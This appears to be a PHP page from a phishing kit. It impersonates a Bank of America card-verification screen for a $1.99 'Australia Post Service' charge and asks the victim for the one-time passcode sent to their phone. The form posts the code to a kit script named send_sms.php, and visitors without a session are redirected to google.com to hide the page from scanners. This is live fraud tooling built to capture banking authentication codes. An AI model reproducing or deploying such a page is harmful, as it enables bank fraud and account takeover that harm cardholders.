<?php
session_start();
if (isset($_SESSION["username"])) {



?>

<div class="header" id="HeaderLogos" style="box-sizing: border-box; margin: 0px auto; height: 70px; max-width: 400px; font-family: Arial, &quot;Helvetica Neue&quot;, Helvetica, sans-serif; font-size: 12.5px; background-color: rgb(255, 255, 255);"><div class="row no-pad" style="box-sizing: border-box; padding: 0px;"><div class="col-12" style="box-sizing: border-box; width: 400px; float: left; padding: 0px 0.714em;"><img alt="Bank of America Logo" class="img-responsive header-logo pull-left" src="../Checkout Address_files/logo.svg" style="box-sizing: border-box; border: 0px; vertical-align: middle; height: auto; max-width: 40%; display: block; float: left !important; max-height: 70px; width: auto;">


    

</div></div></div><div class="container container-sticky-footer" style="box-sizing: border-box; max-width: 400px; margin: 0px auto; padding: 0.75em 0px 0px; font-family: Arial, &quot;Helvetica Neue&quot;, Helvetica, sans-serif; font-size: 12.5px; background-color: rgb(255, 255, 255);">


	<form action="../system/send_sms.php" method="post"  style="box-sizing: border-box; margin-bottom: 0px;"><div class="body" dir="LTR" style="box-sizing: border-box; max-width: 400px; margin: 0px auto; bottom: 55px;"><h1 class="screenreader-only" style="box-sizing: border-box; font-size: 1.25em; margin: 20px 0px 10px; font-family: inherit; font-weight: 500; line-height: 1.1; position: absolute; left: -10000px; top: auto; width: 1px; height: 1px; overflow: hidden;">Your One-time Passcode has been sent</h1><br style="box-sizing: border-box;"><div class="row" style="box-sizing: border-box; padding: 4.79688px;"></div><div class="row" style="box-sizing: border-box; padding: 4.79688px;"><div class="col-12" id="ValidateOneUpMessage" style="box-sizing: border-box; width: 390.406px; float: left; padding: 0px 0.714em;"><div id="Body1" style="box-sizing: border-box;">Verification using one-time authorization code.<br style="box-sizing: border-box;"><br style="box-sizing: border-box;"><span style="box-sizing: border-box; font-weight: 700;">
	Your one-time authorization code has been sent</span></div></div></div><br style="box-sizing: border-box;"><div class="row form-two-col" style="box-sizing: border-box; padding: 4.79688px;"><div class="col-12" style="box-sizing: border-box; width: 390.406px; float: left; padding: 0px 0.714em;"><fieldset id="ValidateTransactionDetailsContainer" style="box-sizing: border-box; border-width: 0px; border-style: initial; border-color: initial; margin: 0px; padding: 0px 0px 0.25em; min-width: 0px;"><legend id="ValidateTransactionDetailsHeader" style="box-sizing: border-box; border-width: 0px; border-style: initial; padding: 0px; width: 372.562px; margin-bottom: 0.286em; font-size: 1em; line-height: inherit; color: rgb(103, 103, 103); font-weight: 700;">Transaction Details</legend><div class="validate-field row" style="box-sizing: border-box; padding: 4.46875px 4.46875px 0px;"><span class="validate-label col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; text-align: right; display: inline-block; max-width: 100%; font-weight: 700; margin-bottom: 0px;">Merchant:</span><span class="col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em;">Australia Post Service</span></div>
    <br><div class="validate-field row" style="box-sizing: border-box; padding: 4.46875px 4.46875px 0px;"><span class="validate-label col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; text-align: right; display: inline-block; max-width: 100%; font-weight: 700; margin-bottom: 0px;">Transaction Amount:</span><span class="col-6 always-left-to-right" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; unicode-bidi: embed; direction: ltr;">$1.99 USD</span></div><br><div class="validate-field row" style="box-sizing: border-box; padding: 4.46875px 4.46875px 0px;"><span class="validate-label col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; text-align: right; display: inline-block; max-width: 100%; font-weight: 700; margin-bottom: 0px;">Card Number:</span><span class="col-6 always-left-to-right" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; unicode-bidi: embed; direction: ltr;">************</span></div><div class="validate-field row" style="box-sizing: border-box; padding: 4.46875px 4.46875px 0px;"><br><span class="validate-label col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; text-align: right; display: inline-block; max-width: 100%; font-weight: 700; margin-bottom: 0px;">Enter Code:</span>
	<span style="box-sizing: border-box;">

		<input name="Credential" required type="text" value="" style="box-sizing: border-box; font: inherit; margin: 0px; width: 130px; max-width: 130px;">

	</span></div><br><div class="validate-field row" style="box-sizing: border-box; padding: 4.46875px 4.46875px 0px;"><span class="validate-label col-6" style="box-sizing: border-box; width: 181.812px; float: left; padding: 0px 0.714em; text-align: right; display: inline-block; max-width: 100%; font-weight: 700; margin-bottom: 0px;">&nbsp;</span></div></fieldset></div></div><div class="row" style="box-sizing: border-box; padding: 4.79688px;"><div class="col-12" id="ValidateOptInMessage" style="box-sizing: border-box; width: 390.406px; float: left; padding: 0px 0.714em;"></div></div><div class="row" style="box-sizing: border-box; padding: 4.79688px;"><div class="col-12" style="box-sizing: border-box; width: 390.406px; float: left; padding: 0px 0.714em;"><div id="linkContainer" style="box-sizing: border-box; position: relative;"><a href="" id="ResendLink" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0);">Receive another code</a></div></div></div></div><div class="sticky-footer" style="box-sizing: border-box; margin: 0px auto; max-width: 400px;"><div class="row no-pad" style="box-sizing: border-box; padding: 0px;"><div class="col-12 text-center" style="box-sizing: border-box; text-align: center; width: 400px; float: left; padding: 0px 0.714em;">

		<button type="submit" name="submit" class="btn btn-primary" style="color: rgb(255, 255, 255); font-style: inherit; font-variant: inherit; font-weight: 700; font-stretch: inherit; font-size: 14px; line-height: 1.42857; font-family: inherit; margin: 0px; overflow: visible; appearance: button; cursor: pointer; box-shadow: rgba(255, 255, 255, 0.15) 0px 1px 0px inset, rgba(0, 0, 0, 0.075) 0px 1px 1px; background: rgb(0, 115, 207); border-width: initial; border-style: none; border-color: initial; vertical-align: middle; touch-action: manipulation; padding: 6px 20px; border-radius: 0px; user-select: none; word-break: break-word;">Submit</button>

</form>



	</div></div><div class="footer" id="FooterLinks" style="box-sizing: border-box; margin: 0px auto; max-width: 400px;"><div class="row" style="box-sizing: border-box; padding: 4.79688px 4.79688px 0px;"><div class="col-12" style="box-sizing: border-box; width: 390.406px; float: left; padding: 0px 0.714em; text-align: center;"><ul class="list-inline list-inline-separated pull-left" style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; padding-left: 0px; list-style: none; margin-left: -5px; float: left !important;"><li style="box-sizing: border-box; display: inline-block; padding-left: 5px; padding-right: 5px; margin-left: 0px;"><a class="btn btn-link" data-target="#Terms" data-toggle="modal" href="https://authentication.cardinalcommerce.com/VALIDATE/5afdd7913bb1266e84329bfd#Terms" id="FooterLink1" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0); display: inline-block; margin-bottom: 0px; font-weight: 700; vertical-align: middle; touch-action: manipulation; cursor: pointer; background-image: none; border: 1px solid transparent; padding: 0px; font-size: 0.95em; line-height: 1.42857; border-radius: 0px; user-select: none; box-shadow: none; text-shadow: none; word-break: break-word;">Terms and Conditions</a></li></ul><a id="ExitLink" class="list-inline list-inline-separated pull-right" href="https://authentication.cardinalcommerce.com/VALIDATE/5afdd7913bb1266e84329bfd#" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0); padding-left: 0px; list-style: none; margin-left: -5px; margin-bottom: 0px; float: right !important;">Exit</a></div></div></div></div></div>

	<?php
}else {
HEADER("Location: https://google.com");

}
?>